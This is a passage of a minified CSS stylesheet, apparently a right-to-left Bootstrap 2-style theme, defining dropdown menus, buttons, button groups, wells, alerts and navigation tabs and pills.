.dropdown { position: relative; } .dropdown-toggle { *margin-bottom: -3px; } .dropdown-toggle:active, .open .dropdown-toggle { outline: 0; } .caret { display: inline-block; width: 0; height: 0; vertical-align: top; border-top: 4px solid #000; border-left: 4px solid transparent; border-right: 4px solid transparent; content: ""; } .dropdown .caret { margin-top: 8px; margin-right: 2px; } .dropdown-menu { position: absolute; top: 100%; right: 0; z-index: 1000; display: none; float: right; min-width: 160px; padding: 5px 0; margin: 2px 0 0; list-style: none; background-color: #fff; border: 1px solid #ccc; border: 1px solid rgba(0,0,0,0.2); *border-left-width: 2px; *border-bottom-width: 2px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2); -moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2); box-shadow: 0 5px 10px rgba(0,0,0,0.2); -webkit-background-clip: padding-box; -moz-background-clip: padding; background-clip: padding-box; } .dropdown-menu.pull-right { left: 0; right: auto; } .dropdown-menu .divider { *width: 100%; height: 1px; margin: 9px 1px; *margin: -5px 0 5px; overflow: hidden; background-color: #e5e5e5; border-bottom: 1px solid #fff; } .dropdown-menu > li > a { display: block; padding: 3px 20px; clear: both; font-weight: normal; line-height: 20px; color: #444; white-space: nowrap; } .dropdown-menu > li > a:hover, .dropdown-menu > li > a:focus, .dropdown-submenu:hover > a, .dropdown-submenu:focus > a { text-decoration: none; color: #222; background-color: #e9e9e9; background-image: -moz-linear-gradient(top,#eee,#e1e1e1); background-image: -webkit-gradient(linear,0 0,0 100%,from(#eee),to(#e1e1e1)); background-image: -webkit-linear-gradient(top,#eee,#e1e1e1); background-image: -o-linear-gradient(top,#eee,#e1e1e1); background-image: linear-gradient(to bottom,#eee,#e1e1e1); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffeeeeee', endColorstr='#ffe1e1e1', GradientType=0); } .dropdown-menu > .active > a, .dropdown-menu > .active > a:hover, .dropdown-menu > .active > a:focus { color: #fff; text-decoration: none; outline: 0; background-color: #1a9bd9; background-image: -moz-linear-gradient(top,#1ba1e2,#1891cb); background-image: -webkit-gradient(linear,0 0,0 100%,from(#1ba1e2),to(#1891cb)); background-image: -webkit-linear-gradient(top,#1ba1e2,#1891cb); background-image: -o-linear-gradient(top,#1ba1e2,#1891cb); background-image: linear-gradient(to bottom,#1ba1e2,#1891cb); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff1ba1e2', endColorstr='#ff1890cb', GradientType=0); } .dropdown-menu > .disabled > a, .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { color: #999; } .dropdown-menu > .disabled > a:hover, .dropdown-menu > .disabled > a:focus { text-decoration: none; background-color: transparent; background-image: none; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); cursor: default; } .open { *z-index: 1000; } .open > .dropdown-menu { display: block; } .dropdown-backdrop { position: fixed; right: 0; left: 0; bottom: 0; top: 0; z-index: 990; } .pull-right > .dropdown-menu { left: 0; right: auto; } .dropup .caret, .navbar-fixed-bottom .dropdown .caret { border-top: 0; border-bottom: 4px solid #000; content: ""; } .dropup .dropdown-menu, .navbar-fixed-bottom .dropdown .dropdown-menu { top: auto; bottom: 100%; margin-bottom: 1px; } .dropdown-submenu { position: relative; } .dropdown-submenu > .dropdown-menu { top: 0; right: 100%; margin-top: -6px; margin-right: -1px; -webkit-border-radius: 6px 0 6px 6px; -moz-border-radius: 6px 0 6px 6px; border-radius: 6px 0 6px 6px; -webkit-border-radius: 6px 0 6px 6px; -moz-border-radius: 6px 0 6px 6px; border-radius: 6px 0 6px 6px; } .dropdown-submenu:hover > .dropdown-menu { display: block; } .dropup .dropdown-submenu > .dropdown-menu { top: auto; bottom: 0; margin-top: 0; margin-bottom: -2px; -webkit-border-radius: 5px 5px 0 5px; -moz-border-radius: 5px 5px 0 5px; border-radius: 5px 5px 0 5px; -webkit-border-radius: 5px 5px 0 5px; -moz-border-radius: 5px 5px 0 5px; border-radius: 5px 5px 0 5px; } .dropdown-submenu > a:after { display: block; content: " "; float: left; width: 0; height: 0; border-color: transparent; border-style: solid; border-width: 5px 5px 5px 0; border-right-color: #cccccc; margin-top: 5px; margin-left: -10px; } .dropdown-submenu:hover > a:after { border-right-color: #222; } .dropdown-submenu.pull-left { float: none; } .dropdown-submenu.pull-left > .dropdown-menu { right: -100%; margin-right: 10px; -webkit-border-radius: 0 6px 6px 6px; -moz-border-radius: 0 6px 6px 6px; border-radius: 0 6px 6px 6px; -webkit-border-radius: 0 6px 6px 6px; -moz-border-radius: 0 6px 6px 6px; border-radius: 0 6px 6px 6px; } .dropdown .dropdown-menu .nav-header { padding-right: 20px; padding-left: 20px; } .typeahead { z-index: 1051; margin-top: 2px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .well { min-height: 20px; padding: 19px; margin-bottom: 20px; background-color: #f5f5f5; border: 1px solid #e3e3e3; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05); -moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05); box-shadow: inset 0 1px 1px rgba(0,0,0,0.05); } .well blockquote { border-color: #ddd; border-color: rgba(0,0,0,0.15); } .well-large { padding: 24px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .well-small { padding: 9px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .close { float: left; font-size: 20px; font-weight: bold; line-height: 20px; color: #000; text-shadow: 0 1px 0 #ffffff; opacity: 0.2; filter: alpha(opacity=20); } .close:hover, .close:focus { color: #000; text-decoration: none; cursor: pointer; opacity: 0.4; filter: alpha(opacity=40); } button.close { padding: 0; cursor: pointer; background: transparent; border: 0; -webkit-appearance: none; } .btn { display: inline-block; *display: inline; *zoom: 1; padding: 4px 12px; margin-bottom: 0; font-size: 13px; line-height: 20px; text-align: center; vertical-align: middle; cursor: pointer; color: #444; text-shadow: 0 1px 1px rgba(255,255,255,0.75); background-color: #f5f5f5; background-image: -moz-linear-gradient(top,#eee,#ffffff); background-image: -webkit-gradient(linear,0 0,0 100%,from(#eee),to(#ffffff)); background-image: -webkit-linear-gradient(top,#eee,#ffffff); background-image: -o-linear-gradient(top,#eee,#ffffff); background-image: linear-gradient(to bottom,#eee,#ffffff); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffeeeeee', endColorstr='#ffffffff', GradientType=0); border-color: #ffffff #ffffff #d9d9d9; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #ffffff; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); border: 1px solid #d5d5d5; *border: 0; border-bottom-color: #bbbbbb; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; *margin-right: .3em; -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); -moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); } .btn:hover, .btn:focus, .btn:active, .btn.active, .btn.disabled, .btn[disabled] { color: #444; background-color: #ffffff; *background-color: #f2f2f2; } .btn:active, .btn.active { background-color: #e6e6e6 \9; } .btn:first-child { *margin-right: 0; } .btn:hover, .btn:focus { color: #444; text-decoration: none; background-position: 100% -15px; -webkit-transition: background-position .1s linear; -moz-transition: background-position .1s linear; -o-transition: background-position .1s linear; transition: background-position .1s linear; } .btn:focus { outline: thin dotted #333; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } .btn.active, .btn:active { background-image: none; outline: 0; -webkit-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); -moz-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); } .btn.disabled, .btn[disabled] { cursor: default; background-image: none; opacity: 0.65; filter: alpha(opacity=65); -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } .btn-large { padding: 11px 19px; font-size: 16.25px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .btn-large [class^="icon-"], .btn-large [class*=" icon-"] { margin-top: 4px; } .btn-small { padding: 2px 10px; font-size: 11.05px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .btn-small [class^="icon-"], .btn-small [class*=" icon-"] { margin-top: 0; } .btn-mini [class^="icon-"], .btn-mini [class*=" icon-"] { margin-top: -1px; } .btn-mini { padding: 0 6px; font-size: 9.75px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .btn-block { display: block; width: 100%; padding-right: 0; padding-left: 0; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } .btn-block + .btn-block { margin-top: 5px; } input[type="submit"].btn-block, input[type="reset"].btn-block, input[type="button"].btn-block { width: 100%; } .btn-primary.active, .btn-warning.active, .btn-danger.active, .btn-success.active, .btn-info.active, .btn-inverse.active { color: rgba(255,255,255,0.75); } .btn-primary { color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #2da9e5; background-image: -moz-linear-gradient(top,#1ba1e2,#47b4e9); background-image: -webkit-gradient(linear,0 0,0 100%,from(#1ba1e2),to(#47b4e9)); background-image: -webkit-linear-gradient(top,#1ba1e2,#47b4e9); background-image: -o-linear-gradient(top,#1ba1e2,#47b4e9); background-image: linear-gradient(to bottom,#1ba1e2,#47b4e9); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff1ba1e2', endColorstr='#ff46b4e9', GradientType=0); border-color: #47b4e9 #47b4e9 #1891cb; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #47b4e9; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-primary:hover, .btn-primary:focus, .btn-primary:active, .btn-primary.active, .btn-primary.disabled, .btn-primary[disabled] { color: #fff; background-color: #47b4e9; *background-color: #30abe6; } .btn-primary:active, .btn-primary.active { background-color: #1ba1e2 \9; } .btn-warning { color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #dc613e; background-image: -moz-linear-gradient(top,#d9532d,#e17658); background-image: -webkit-gradient(linear,0 0,0 100%,from(#d9532d),to(#e17658)); background-image: -webkit-linear-gradient(top,#d9532d,#e17658); background-image: -o-linear-gradient(top,#d9532d,#e17658); background-image: linear-gradient(to bottom,#d9532d,#e17658); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9532d', endColorstr='#ffe07658', GradientType=0); border-color: #e17658 #e17658 #c84824; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #e17658; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-warning:hover, .btn-warning:focus, .btn-warning:active, .btn-warning.active, .btn-warning.disabled, .btn-warning[disabled] { color: #fff; background-color: #e17658; *background-color: #dd6543; } .btn-warning:active, .btn-warning.active { background-color: #d9532d \9; } .btn-danger { color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #d92d51; background-image: -moz-linear-gradient(top,#d21f45,#e34163); background-image: -webkit-gradient(linear,0 0,0 100%,from(#d21f45),to(#e34163)); background-image: -webkit-linear-gradient(top,#d21f45,#e34163); background-image: -o-linear-gradient(top,#d21f45,#e34163); background-image: linear-gradient(to bottom,#d21f45,#e34163); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd21f45', endColorstr='#ffe24163', GradientType=0); border-color: #e34163 #e34163 #bc1c3e; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #e34163; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-danger:hover, .btn-danger:focus, .btn-danger:active, .btn-danger.active, .btn-danger.disabled, .btn-danger[disabled] { color: #fff; background-color: #e34163; *background-color: #e02b51; } .btn-danger:active, .btn-danger.active { background-color: #d21f45 \9; } .btn-success { color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #93c431; background-image: -moz-linear-gradient(top,#88b828,#a3d53e); background-image: -webkit-gradient(linear,0 0,0 100%,from(#88b828),to(#a3d53e)); background-image: -webkit-linear-gradient(top,#88b828,#a3d53e); background-image: -o-linear-gradient(top,#88b828,#a3d53e); background-image: linear-gradient(to bottom,#88b828,#a3d53e); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff88b828', endColorstr='#ffa2d53d', GradientType=0); border-color: #a3d53e #a3d53e #79a323; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #a3d53e; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-success:hover, .btn-success:focus, .btn-success:active, .btn-success.active, .btn-success.disabled, .btn-success[disabled] { color: #fff; background-color: #a3d53e; *background-color: #97cd2d; } .btn-success:active, .btn-success.active { background-color: #88b828 \9; } .btn-info { color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #2da9e5; background-image: -moz-linear-gradient(top,#1ba1e2,#47b4e9); background-image: -webkit-gradient(linear,0 0,0 100%,from(#1ba1e2),to(#47b4e9)); background-image: -webkit-linear-gradient(top,#1ba1e2,#47b4e9); background-image: -o-linear-gradient(top,#1ba1e2,#47b4e9); background-image: linear-gradient(to bottom,#1ba1e2,#47b4e9); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff1ba1e2', endColorstr='#ff46b4e9', GradientType=0); border-color: #47b4e9 #47b4e9 #1891cb; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #47b4e9; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-info:hover, .btn-info:focus, .btn-info:active, .btn-info.active, .btn-info.disabled, .btn-info[disabled] { color: #fff; background-color: #47b4e9; *background-color: #30abe6; } .btn-info:active, .btn-info.active { background-color: #1ba1e2 \9; } .btn-inverse { color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #4e4e4e; background-image: -moz-linear-gradient(top,#444,#5e5e5e); background-image: -webkit-gradient(linear,0 0,0 100%,from(#444),to(#5e5e5e)); background-image: -webkit-linear-gradient(top,#444,#5e5e5e); background-image: -o-linear-gradient(top,#444,#5e5e5e); background-image: linear-gradient(to bottom,#444,#5e5e5e); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff444444', endColorstr='#ff5d5d5d', GradientType=0); border-color: #5e5e5e #5e5e5e #373737; border-color: rgba(0,0,0,0.1) rgba(0,0,0,0.1) rgba(0,0,0,0.25); *background-color: #5e5e5e; filter: progid:DXImageTransform.Microsoft.gradient(enabled = false); } .btn-inverse:hover, .btn-inverse:focus, .btn-inverse:active, .btn-inverse.active, .btn-inverse.disabled, .btn-inverse[disabled] { color: #fff; background-color: #5e5e5e; *background-color: #515151; } .btn-inverse:active, .btn-inverse.active { background-color: #444444 \9; } button.btn, input[type="submit"].btn { *padding-top: 3px; *padding-bottom: 3px; } button.btn::-moz-focus-inner, input[type="submit"].btn::-moz-focus-inner { padding: 0; border: 0; } button.btn.btn-large, input[type="submit"].btn.btn-large { *padding-top: 7px; *padding-bottom: 7px; } button.btn.btn-small, input[type="submit"].btn.btn-small { *padding-top: 3px; *padding-bottom: 3px; } button.btn.btn-mini, input[type="submit"].btn.btn-mini { *padding-top: 1px; *padding-bottom: 1px; } .btn-link, .btn-link:active, .btn-link[disabled] { background-color: transparent; background-image: none; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; } .btn-link { border-color: transparent; cursor: pointer; color: #1ba1e2; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .btn-link:hover, .btn-link:focus { color: #1ba1e2; text-decoration: underline; background-color: transparent; } .btn-link[disabled]:hover, .btn-link[disabled]:focus { color: #444; text-decoration: none; } .btn-group { position: relative; display: inline-block; *display: inline; *zoom: 1; font-size: 0; vertical-align: middle; white-space: nowrap; *margin-right: .3em; } .btn-group:first-child { *margin-right: 0; } .btn-group + .btn-group { margin-right: 5px; } .btn-toolbar { font-size: 0; margin-top: 10px; margin-bottom: 10px; } .btn-toolbar > .btn + .btn, .btn-toolbar > .btn-group + .btn, .btn-toolbar > .btn + .btn-group { margin-right: 5px; } .btn-group > .btn { position: relative; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .btn-group > .btn + .btn { margin-right: -1px; } .btn-group > .btn, .btn-group > .dropdown-menu, .btn-group > .popover { font-size: 13px; } .btn-group > .btn-mini { font-size: 9.75px; } .btn-group > .btn-small { font-size: 11.05px; } .btn-group > .btn-large { font-size: 16.25px; } .btn-group > .btn:first-child { margin-right: 0; -webkit-border-top-right-radius: 4px; -moz-border-radius-topright: 4px; border-top-right-radius: 4px; -webkit-border-bottom-right-radius: 4px; -moz-border-radius-bottomright: 4px; border-bottom-right-radius: 4px; } .btn-group > .btn:last-child, .btn-group > .dropdown-toggle { -webkit-border-top-left-radius: 4px; -moz-border-radius-topleft: 4px; border-top-left-radius: 4px; -webkit-border-bottom-left-radius: 4px; -moz-border-radius-bottomleft: 4px; border-bottom-left-radius: 4px; } .btn-group > .btn.large:first-child { margin-right: 0; -webkit-border-top-right-radius: 6px; -moz-border-radius-topright: 6px; border-top-right-radius: 6px; -webkit-border-bottom-right-radius: 6px; -moz-border-radius-bottomright: 6px; border-bottom-right-radius: 6px; } .btn-group > .btn.large:last-child, .btn-group > .large.dropdown-toggle { -webkit-border-top-left-radius: 6px; -moz-border-radius-topleft: 6px; border-top-left-radius: 6px; -webkit-border-bottom-left-radius: 6px; -moz-border-radius-bottomleft: 6px; border-bottom-left-radius: 6px; } .btn-group > .btn:hover, .btn-group > .btn:focus, .btn-group > .btn:active, .btn-group > .btn.active { z-index: 2; } .btn-group .dropdown-toggle:active, .btn-group.open .dropdown-toggle { outline: 0; } .btn-group > .btn + .dropdown-toggle { padding-right: 8px; padding-left: 8px; -webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); -moz-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05); *padding-top: 5px; *padding-bottom: 5px; } .btn-group > .btn-mini + .dropdown-toggle { padding-right: 5px; padding-left: 5px; *padding-top: 2px; *padding-bottom: 2px; } .btn-group > .btn-small + .dropdown-toggle { *padding-top: 5px; *padding-bottom: 4px; } .btn-group > .btn-large + .dropdown-toggle { padding-right: 12px; padding-left: 12px; *padding-top: 7px; *padding-bottom: 7px; } .btn-group.open .dropdown-toggle { background-image: none; -webkit-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); -moz-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05); } .btn-group.open .btn.dropdown-toggle { background-color: #ffffff; } .btn-group.open .btn-primary.dropdown-toggle { background-color: #47b4e9; } .btn-group.open .btn-warning.dropdown-toggle { background-color: #e17658; } .btn-group.open .btn-danger.dropdown-toggle { background-color: #e34163; } .btn-group.open .btn-success.dropdown-toggle { background-color: #a3d53e; } .btn-group.open .btn-info.dropdown-toggle { background-color: #47b4e9; } .btn-group.open .btn-inverse.dropdown-toggle { background-color: #5e5e5e; } .btn .caret { margin-top: 8px; margin-right: 0; } .btn-large .caret { margin-top: 6px; } .btn-large .caret { border-right-width: 5px; border-left-width: 5px; border-top-width: 5px; } .btn-mini .caret, .btn-small .caret { margin-top: 8px; } .dropup .btn-large .caret { border-bottom-width: 5px; } .btn-primary .caret, .btn-warning .caret, .btn-danger .caret, .btn-info .caret, .btn-success .caret, .btn-inverse .caret { border-top-color: #fff; border-bottom-color: #fff; } .btn-group-vertical { display: inline-block; *display: inline; *zoom: 1; } .btn-group-vertical > .btn { display: block; float: none; max-width: 100%; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .btn-group-vertical > .btn + .btn { margin-right: 0; margin-top: -1px; } .btn-group-vertical > .btn:first-child { -webkit-border-radius: 4px 4px 0 0; -moz-border-radius: 4px 4px 0 0; border-radius: 4px 4px 0 0; -webkit-border-radius: 4px 4px 0 0; -moz-border-radius: 4px 4px 0 0; border-radius: 4px 4px 0 0; } .btn-group-vertical > .btn:last-child { -webkit-border-radius: 0 0 4px 4px; -moz-border-radius: 0 0 4px 4px; border-radius: 0 0 4px 4px; -webkit-border-radius: 0 0 4px 4px; -moz-border-radius: 0 0 4px 4px; border-radius: 0 0 4px 4px; } .btn-group-vertical > .btn-large:first-child { -webkit-border-radius: 6px 6px 0 0; -moz-border-radius: 6px 6px 0 0; border-radius: 6px 6px 0 0; -webkit-border-radius: 6px 6px 0 0; -moz-border-radius: 6px 6px 0 0; border-radius: 6px 6px 0 0; } .btn-group-vertical > .btn-large:last-child { -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; } .alert { padding: 8px 14px 8px 35px; margin-bottom: 20px; text-shadow: 0 1px 0 rgba(255,255,255,0.5); background-color: #fcf8e3; border: 1px solid #fbeed5; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; } .alert, .alert h4 { color: #c09853; } .alert h4 { margin: 0; } .alert .close { position: relative; top: -2px; left: -21px; line-height: 20px; } .alert-success { background-color: #dff0d8; border-color: #d6e9c6; color: #468847; } .alert-success h4 { color: #468847; } .alert-danger, .alert-error { background-color: #f2dede; border-color: #eed3d7; color: #b94a48; } .alert-danger h4, .alert-error h4 { color: #b94a48; } .alert-info { background-color: #d9edf7; border-color: #bce8f1; color: #3a87ad; } .alert-info h4 { color: #3a87ad; } .alert-block { padding-top: 14px; padding-bottom: 14px; } .alert-block > p, .alert-block > ul { margin-bottom: 0; } .alert-block p + p { margin-top: 5px; } .nav { margin-right: 0; margin-bottom: 20px; list-style: none; } .nav > li > a { display: block; } .nav > li > a:hover, .nav > li > a:focus { text-decoration: none; background-color: #eee; } .nav > li > a > img { max-width: none; } .nav > .pull-right { float: left; } .nav-header { display: block; padding: 3px 15px; font-size: 11px; font-weight: bold; line-height: 20px; color: #999; text-shadow: 0 1px 0 rgba(255,255,255,0.5); text-transform: uppercase; } .nav li + .nav-header { margin-top: 9px; } .nav-list { padding-right: 15px; padding-left: 15px; margin-bottom: 0; } .nav-list > li > a, .nav-list .nav-header { margin-right: -15px; margin-left: -15px; text-shadow: 0 1px 0 rgba(255,255,255,0.5); } .nav-list > li > a { padding: 3px 15px; } .nav-list > .active > a, .nav-list > .active > a:hover, .nav-list > .active > a:focus { color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.2); background-color: #1ba1e2; } .nav-list [class^="icon-"], .nav-list [class*=" icon-"] { margin-left: 2px; } .nav-list .divider { *width: 100%; height: 1px; margin: 9px 1px; *margin: -5px 0 5px; overflow: hidden; background-color: #e5e5e5; border-bottom: 1px solid #fff; } .nav-tabs, .nav-pills { *zoom: 1; } .nav-tabs:before, .nav-tabs:after, .nav-pills:before, .nav-pills:after { display: table; content: ""; line-height: 0; } .nav-tabs:after, .nav-pills:after { clear: both; } .nav-tabs > li, .nav-pills > li { float: right; } .nav-tabs > li > a, .nav-pills > li > a { padding-left: 12px; padding-right: 12px; margin-left: 2px; line-height: 14px; } .nav-tabs { border-bottom: 1px solid #ddd; } .nav-tabs > li { margin-bottom: -1px; } .nav-tabs > li > a { padding-top: 8px; padding-bottom: 8px; line-height: 20px; border: 1px solid transparent; -webkit-border-radius: 4px 4px 0 0; -moz-border-radius: 4px 4px 0 0; border-radius: 4px 4px 0 0; -webkit-border-radius: 4px 4px 0 0; -moz-border-radius: 4px 4px 0 0; border-radius: 4px 4px 0 0; } .nav-tabs > li > a:hover, .nav-tabs > li > a:focus { border-color: #eee #eee #ddd; } .nav-tabs > .active > a, .nav-tabs > .active > a:hover, .nav-tabs > .active > a:focus { color: #666; background-color: #F5F5F5; border: 1px solid #ddd; border-bottom-color: transparent; cursor: default; } .nav-pills > li > a { padding-top: 8px; padding-bottom: 8px; margin-top: 2px; margin-bottom: 2px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } .nav-pills > .active > a, .nav-pills > .active > a:hover, .nav-pills > .active > a:focus { color: #fff; background-color: #1ba1e2; } .nav-stacked > li { float: none; } .nav-stacked > li > a { margin-left: 0; } .nav-tabs.nav-stacked { border-bottom: 0; } .nav-tabs.nav-stacked > li > a { border: 1px solid #ddd; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; -webkit-border-radius: 0; -moz-border-radius: 0; border-radius: 0; } .nav-tabs.nav-stacked > li:first-child > a { -webkit-border-top-left-radius: 4px; -moz-border-radius-topleft: 4px; border-top-left-radius: 4px; -webkit-border-top-right-radius: 4px; -moz-border-radius-topright: 4px; border-top-right-radius: 4px; } .nav-tabs.nav-stacked > li:last-child > a { -webkit-border-bottom-left-radius: 4px; -moz-border-radius-bottomleft: 4px; border-bottom-left-radius: 4px; -webkit-border-bottom-right-radius: 4px; -moz-border-radius-bottomright: 4px; border-bottom-right-radius: 4px; } .nav-tabs.nav-stacked > li > a:hover, .nav-tabs.nav-stacked > li > a:focus { border-color: #ddd; z-index: 2; } .nav-pills.nav-stacked > li > a { margin-bottom: 3px; } .nav-pills.nav-stacked > li:last-child > a { margin-bottom: 1px; } .nav-tabs .dropdown-menu { -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; -webkit-border-radius: 0 0 6px 6px; -moz-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; } .nav-pills .dropdown-menu { -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; } .nav .dropdown-toggle .caret { border-top-color: #1ba1e2; border-bottom-color: #1ba1e2; margin-top: 6px; } .nav .dropdown-toggle:hover .caret, .nav .dropdown-toggle:focus .caret { border-top-color: #1ba1e2; border-bottom-color: #1ba1e2; } .nav-tabs .dropdown-toggle .caret { margin-top: 8px; } .nav .active .dropdown-toggle .caret { border-top-color: #fff; border-bottom-color: #fff; } .nav-tabs .active .dropdown-toggle .caret { border-top-color: #666; border-bottom-color: #666; } .nav > .dropdown.active > a:hover, .nav > .dropdown.active > a:focus { cursor: pointer; } .nav-tabs .open .dropdown-toggle, .nav-pills .open .dropdown-toggle, .nav > li.dropdown.open.active > a:hover, .nav > li.dropdown.open.active > a:focus { color: #fff; background-color: #999; border-color: #999; } .nav li.dropdown.open .caret, .nav li.dropdown.open.active .caret, .nav li.dropdown.open a:hover .caret, .nav li.dropdown.open a:focus .caret { border-top-color: #fff; border-bottom-color: #fff; opacity: 1; filter: alpha(opacity=100); } .tabs-stacked .open > a:hover, .tabs-stacked .open > a:focus { border-color: #999; } .tabbable { *zoom: 1; } .tabbable:before, .tabbable:after { display: table; content: ""; line-height: 0; } .tabbable:after { clear: both; } .tab-content { overflow: auto; } .tabs-below > .nav-tabs, .tabs-right > .nav-tabs, .tabs-left > .nav-tabs { border-bottom: 0; } .tab-content > .tab-pane, .pill-content > .pill-pane { display: none; } .tab-content > .active, .pill-content > .active { display: block; } .tabs-below > .nav-tabs { border-top: 1px solid #ddd; } .tabs-below > .nav-tabs > li { margin-top: -1px; margin-bottom: 0; } .tabs-below > .nav-tabs > li > a { -webkit-border-radius: 0 0 4px 4px; -moz-border-radius: 0 0 4px 4px; border-radius: 0 0 4px 4px; -webkit-border-radius: 0 0 4px 4px; -moz-border-radius: 0 0 4px 4px; border-radius: 0 0 4px 4px; } .tabs-below > .nav-tabs > li > a:hover, .tabs-below > .nav-tabs > li > a:focus { border-bottom-color: transparent; border-top-color: #ddd; } .tabs-below > .nav-tabs > .active > a, .tabs-below > .nav-tabs > 